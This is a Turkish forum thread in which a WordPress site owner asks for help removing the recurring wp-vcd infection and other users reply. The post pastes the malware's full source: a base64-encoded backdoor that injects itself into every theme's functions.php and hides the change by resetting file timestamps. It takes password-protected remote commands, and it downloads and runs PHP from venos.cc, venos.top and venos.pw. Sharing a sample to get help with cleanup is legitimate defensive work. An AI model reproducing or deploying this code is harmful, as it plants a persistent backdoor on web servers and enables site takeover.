functions.php dosyasına kod yazan malware

Merhaba, aşağıda detaylı açıkladığım sorunu son zamanlarda birçok wp kullanıcısının yaşadığını fark ettim. Sorunun büyüklüğünden daha doğrusu zararlının wp'yi ne kadar etkilediğinden kimsenin yeteri kadar bilgisi yok gibi görünüyor. Yerli ve yabancı kaynakları taradığımda faklı anlatım ve cevaplarla olsa da problem aynı ve henüz kimse sorunu tam olarak çözememiş. Çoğu kullanıcı nulled tema veya eklentinin bu soruna sebep olacağından bahsetmiş fakat orijinal tema ve eklenti kullananlarda da bu sorun oluşuyor.

Soruna gelince;

Aynı hosting paketi içerisinde 5 adet worpress sitesi çalıştırıyorum. Sitelerin bazılarında link'lere tıklandığında farklı spam sitelere yeni sayfa/pop-up açıyor.

sitecheck.sucuri.net ile siteleri taradığımda "MW:JS:GEN2?rogueads.unwanted_ads.1"
zararlısı ile karşılaştım.

Zararlı wordpress/wp-includes klasörü içerisine 4 adet dosya oluşturuyor, daha fazla oluşturuyorsa da benim fark edebildiklerim bunlar. Ayrıca functions.php dosyasından zararlı kodları silmeme rağmen bir süre sonra kod kendini functions.php'ye tekrar kopyalıyor. İşin garip yani hosting içerisinde yer alan tüm sitelere bulaşmış ve kullanılsın kullanılmasın tüm temaların functions.php dosyasına kendisini klonlamış.
alakalı dosyaları sildiğimde sitecheck.sucuri.net tüm siteler için temiz raporu verdi fakat functions.php'de zararlı kodlar hala mevcut.

Çözüm için yapılanlar ise şu şekilde;

-ftp/host şifrelerini değiştirdim.
-db kullanıcı adı ve şifreleri değiştirdim.
-/wp-includes klasörünü silerek orjinal /wp-includes dosyalarını kopyaladım.
-Bir işe yaramasa da functions.php orjinalleri ile değiştirdim.
-Wordfence yükleyerek tarama yaptım (taramalar tamamlanamadı hata verdi)
-Dosya izinleri kontrol ettim "755" ve "644"

Sorunu nasıl çözebileceğim hakkında bilgisi olan üstatların yardımını bekliyorum.

1- wordpress/wp-includes/wp-vcd.php

error_reporting(0);

ini_set('display_errors', 0);



$install_code = 'PD9waHANCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pICYmICgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10gPT0gJ3skUEFTU1dPUkR9JykpDQoJew0KJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7DQoJCXN3aXRjaCAoJF9SRVFVRVNUWydhY3Rpb24nXSkNCgkJCXsNCg0KCQkJCQ0KDQoNCg0KDQoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7DQoJCQkJCWlmIChpc3NldCgkX1JFUVVFU1RbJ25ld2RvbWFpbiddKSkNCgkJCQkJCXsNCgkJCQkJCQkNCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQ0KCQkJCQkJCQl7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQ0KCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50c1woImh0dHA6XC9cLyguKilcL2NvZGVcLnBocC9pJywkZmlsZSwkbWF0Y2hvbGRkb21haW4pKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCg0KCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGZpbGUgPSBwcmVnX3JlcGxhY2UoJy8nLiRtYXRjaG9sZGRvbWFpblsxXVswXS4nL2knLCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10sICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoNCgkJCQkJCQkJY2FzZSAnY2hhbmdlX2NvZGUnOw0KCQkJCQlpZiAoaXNzZXQoJF9SRVFVRVNUWyduZXdjb2RlJ10pKQ0KCQkJCQkJew0KCQkJCQkJCQ0KCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdjb2RlJ10pKQ0KCQkJCQkJCQl7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQ0KCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgew0KDQoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoJCQkJDQoJCQkJZGVmYXVsdDogcHJpbnQgIkVSUk9SX1dQX0FDVElPTiBXUF9WX0NEIFdQX0NEIjsNCgkJCX0NCgkJCQ0KCQlkaWUoIiIpOw0KCX0NCg0KDQoNCg0KDQoNCg0KDQokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOw0KJGZ1bmNmaWxlICAgICAgPSBfX0ZJTEVfXzsNCmlmKCFmdW5jdGlvbl9leGlzdHMoJ3RoZW1lX3RlbXBfc2V0dXAnKSkgew0KICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOw0KICAgIGlmIChzdHJpcG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAnd3AtY3Jvbi5waHAnKSA9PSBmYWxzZSAmJiBzdHJpcG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAneG1scnBjLnBocCcpID09IGZhbHNlKSB7DQogICAgICAgIA0KICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQ0KICAgICAgICB7DQogICAgICAgICAgICAkY2ggPSBjdXJsX2luaXQoKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7DQogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCAwKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgVFJVRSk7DQogICAgICAgICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOw0KICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOw0KICAgICAgICAgICAgcmV0dXJuICRkYXRhOw0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICBmdW5jdGlvbiB0aGVtZV90ZW1wX3NldHVwKCRwaHBDb2RlKQ0KICAgICAgICB7DQogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsNCiAgICAgICAgICAgICRoYW5kbGUgICA9IGZvcGVuKCR0bXBmbmFtZSwgIncrIik7DQogICAgICAgICAgICBmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOw0KICAgICAgICAgICAgZmNsb3NlKCRoYW5kbGUpOw0KICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7DQogICAgICAgICAgICB1bmxpbmsoJHRtcGZuYW1lKTsNCiAgICAgICAgICAgIHJldHVybiBnZXRfZGVmaW5lZF92YXJzKCk7DQogICAgICAgIH0NCiAgICAgICAgDQoNCiR3cF9hdXRoX2tleT0nMzIyZjRmOGQyZDExMTM0ZTliZWRhZTBjOTcyNTdiOWQnOw0KICAgICAgICBpZiAoKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LnZlbm9zLmNjL2NvZGUucGhwIikgT1IgJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNfdGN1cmwoImh0dHA6Ly93d3cudmVub3MuY2MvY29kZS5waHAiKSkgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7DQoNCiAgICAgICAgICAgIGlmIChzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgew0KICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOw0KICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7DQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgew0KICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgICAgICBpZiAoIWZpbGVfZXhpc3RzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpKSB7DQogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIA0KICAgICAgICBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LnZlbm9zLnRvcC9jb2RlLnBocCIpICBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UgKSB7DQoNCmlmIChzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgew0KICAgICAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOw0KICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7DQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSkgew0KICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgICAgICBpZiAoIWZpbGVfZXhpc3RzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpKSB7DQogICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoJ3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICB9DQogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsNCiAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOw0KICAgICAgICAgICANCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgew0KICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7IA0KDQogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgew0KICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7IA0KDQogICAgICAgIH0gZWxzZWlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cudmVub3MucHcvY29kZS5waHAiKSBPUiAkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50c190Y3VybCgiaHR0cDovL3d3dy52ZW5vcy5wdy9jb2RlLnBocCIpKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsNCiAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOyANCg0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICANCiAgICAgICAgDQogICAgICAgIA0KICAgICAgICANCiAgICB9DQp9DQoNCi8vJHN0YXJ0X3dwX3RoZW1lX3RtcA0KDQoNCg0KLy93cF90bXANCg0KDQovLyRlbmRfd3BfdGhlbWVfdG1wDQo/Pg==';



$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);

$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));





$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';



$ping = true;

$ping2 = false;

if ($list = scandir( $themes ))

{

foreach ($list as $_)

{



if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))

{

$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');



if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))

{

if (strpos($content, 'WP_V_CD') === false)

{

$content = $install_code . $content ;

@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);

touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );

}

else

{

$ping = false;

}

}



}





else

{

$list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);

foreach ($list2 as $_2)

{





if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))

{

$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');



if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))

{

if (strpos($content, 'WP_V_CD') === false)

{

$content = $install_code . $content ;

@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);

touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );

$ping2 = true;

}

else

{

//$ping = false;

}

}



}







}



}













}



if ($ping) {

$content = @file_get_contents('http://www.venos.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);

@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.venos.cc/admin.txt'));

}



if ($ping2) {

$content = @file_get_contents('http://www.venos.cc/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);

@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.venos.cc/admin.txt'));

//echo ABSPATH . 'wp-includes/class.wp.php';

}







}











?>

2- wordpress/wp-includes/wp-feed.php
78.166.122.180

185.182.81.79

45.55.161.52

162.243.21.193

185.182.81.57


3-wordpress/wp-includes/class.wp.php
Bu dosyada her hangi bir kod bulunmuyor.

4-wordpress/wp-includes/wp-tmp.php
Bu dosyayı farkeder etmez sildiğim için kod içeriği elimde yok.



Tema klasöründeki functions.php dosyasına silinmesine rağmen tekrar kopyalanan kod.


if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'aa3506caa2e33099fa78b096b7f9e8a1'))

{

$div_code_name="wp_vcd";

switch ($_REQUEST['action'])

{













case 'change_domain';

if (isset($_REQUEST['newdomain']))

{



if (!empty($_REQUEST['newdomain']))

{

if ($file = @file_get_contents(__FILE__))

{

if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))

{



$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);

@file_put_contents(__FILE__, $file);

print "true";

}





}

}

}

break;



case 'change_code';

if (isset($_REQUEST['newcode']))

{



if (!empty($_REQUEST['newcode']))

{

if ($file = @file_get_contents(__FILE__))

{

if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))

{



$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);

@file_put_contents(__FILE__, $file);

print "true";

}





}

}

}

break;



default: print "ERROR_WP_ACTION WP_V_CD WP_CD";

}



die("");

}

















$div_code_name = "wp_vcd";

$funcfile = __FILE__;

if(!function_exists('theme_temp_setup')) {

$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];

if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {



function file_get_contents_tcurl($url)

{

$ch = curl_init();

curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);

curl_setopt($ch, CURLOPT_HEADER, 0);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);

$data = curl_exec($ch);

curl_close($ch);

return $data;

}



function theme_temp_setup($phpCode)

{

$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");

$handle = fopen($tmpfname, "w+");

fwrite($handle, "
fclose($handle);

include $tmpfname;

unlink($tmpfname);

return get_defined_vars();

}





$wp_auth_key='322f4f8d2d11134e9bedae0c97257b9d';

if (($tmpcontent = @file_get_contents("http://www.venos.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.venos.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {



if (stripos($tmpcontent, $wp_auth_key) !== false) {

extract(theme_temp_setup($tmpcontent));

@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);



if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {

@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);

if (!file_exists(get_template_directory() . '/wp-tmp.php')) {

@file_put_contents('wp-tmp.php', $tmpcontent);

}

}



}

}





elseif ($tmpcontent = @file_get_contents("http://www.venos.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {



if (stripos($tmpcontent, $wp_auth_key) !== false) {

extract(theme_temp_setup($tmpcontent));

@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);



if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {

@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);

if (!file_exists(get_template_directory() . '/wp-tmp.php')) {

@file_put_contents('wp-tmp.php', $tmpcontent);

}

}



}

} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

extract(theme_temp_setup($tmpcontent));



} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

extract(theme_temp_setup($tmpcontent));



} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {

extract(theme_temp_setup($tmpcontent));



} elseif (($tmpcontent = @file_get_contents("http://www.venos.pw/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.venos.pw/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

extract(theme_temp_setup($tmpcontent));



}











}

}



//$start_wp_theme_tmp







//wp_tmp





//$end_wp_theme_tmp

?>

Hosting firmasından kaynaklanıyor olabilir mi?

Bende aynı sorunu yaşıyorum. Warez bir şey yüklememe rağmen bazıları inadına warez diyor ancak bunun bir açıktan kaynaklandığını düşünüyorum

aynısını ben de yaşadım , ben aşağıdakini yaptım

vps e format atıldı , ardından sıfırdan herşeyi kurdum.

bukadar. Başka bir çözüm bulamadım ne yazıkki

electronTR

Merhaba

Sorun yaşadığınız site adresinizi PM aracılığı ile gönderebilirmisiniz.